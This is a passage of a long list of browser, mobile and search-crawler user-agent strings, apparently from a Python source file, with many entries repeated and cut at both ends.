KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 